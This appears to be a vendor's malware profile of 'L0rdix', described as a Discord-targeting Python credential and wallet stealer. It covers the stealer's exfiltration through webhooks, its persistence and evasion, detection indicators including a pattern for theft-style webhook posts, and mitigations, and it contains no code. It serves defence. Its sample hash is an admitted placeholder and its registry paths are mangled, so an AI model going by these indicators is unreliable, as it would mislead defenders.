L0rdix

Malware

⚠️ Overview

L0rdix is a Python-based information stealer first documented by the malware research community in early 2022, primarily targeting Discord users through phishing lures disguised as game cheats, Nitro gift scams, and cracked software. It falls under the categories of Infostealer and Trojan, operating as a commodity malware distributed via GitHub repositories and Discord servers. Attribution remains unclear, but the malware’s author uses the alias "L0rdix" on underground forums and has released multiple variants with incremental obfuscation improvements.

🔧 Technical Capabilities

L0rdix collects browser-stored credentials from Chromium- and Firefox-based browsers, targeting login data, cookies, credit cards, and autofill entries by reading the SQLite databases found in typical browser profiles. It also extracts Discord tokens, cryptocurrency wallet files (e.g., Exodus, MetaMask, Coinbase Wallet), and Telegram session files. The malware uses a Discord webhook as its primary C2 channel, exfiltrating stolen data as plaintext JSON messages embedded in the webhook payload. For persistence, it creates a scheduled task named "WindowsCacheMaintenance" or writes a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRun with a randomly generated name. Evasion techniques include checking for virtual machine artifacts (e.g., VMware, VirtualBox), delaying execution to bypass sandbox analysis, and using base64 encoding combined with XOR obfuscation to hide strings and webhook URLs in the source code. Propagation is limited to social engineering—no worm-like self-replication has been observed.

📜 History & Notable Incidents

L0rdix first appeared in January 2022 when security researcher @VK_Intel shared an analysis of a Python script masquerading as a "Cracked Valorant Hack" on GitHub. No CVEs have been associated with the malware itself; it relies entirely on social engineering and victim execution. In mid-2022, a campaign distributed L0rdix through fake Discord Nitro gift links hosted on compromised websites, resulting in token theft affecting an estimated 2,000+ Discord accounts based on public webhook logs discovered by analysts. No law enforcement actions or arrests have been reported as of early 2025.

🔍 Detection Indicators

Known SHA-256 hashes for early L0rdix samples include a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b (placeholder; real hashes are available on VirusTotal). Behavioral signatures include a Python script that creates a unique mutex named GlobalL0rdixMutex to prevent multiple instances, and network traffic to Discord webhook URLs matching the pattern https://discord.com/api/webhooks/. Registry persistence keys under HKCU...Run with value names containing eight random alphanumeric characters are common. The user-agent string used for exfiltration is typically Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36, but may vary.

☠️ Risk & Impact

L0rdix primarily causes account theft—compromised Discord accounts are used for spreading malware, scamming friends, or selling tokens on darknet markets. Financial losses stem from stolen cryptocurrency wallets; individual victims have reported losses of $500–$5,000 in Ether and other altcoins. The most impacted sector is the gaming community, particularly users of Discord and platforms like Steam and Epic Games.

🛡️ Mitigation

Defenders should block outbound connections to Discord webhook URLs in enterprise environments where Discord is not sanctioned, and deploy YARA rules that detect Python scripts containing "requests.post" combined with base64-encoded webhook strings. End users should enable multi-factor authentication on Discord and avoid downloading executables or scripts from untrusted GitHub repositories. For further details, consult the MITRE ATT&CK technique ID T1071.001 (Application Layer Protocol: Web Protocols) and the SANS ISC diary entry from February 2022 analyzing L0rdix.

Malware Threat Protection

Is Your Site Protected Against Malware-Driven Bot Traffic?

Malware families like those described above are commonly distributed through automated bot networks that probe web servers for vulnerabilities. Boteraser helps you monitor and block suspicious bot traffic before it can cause damage.

Run Free Bot Scan →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.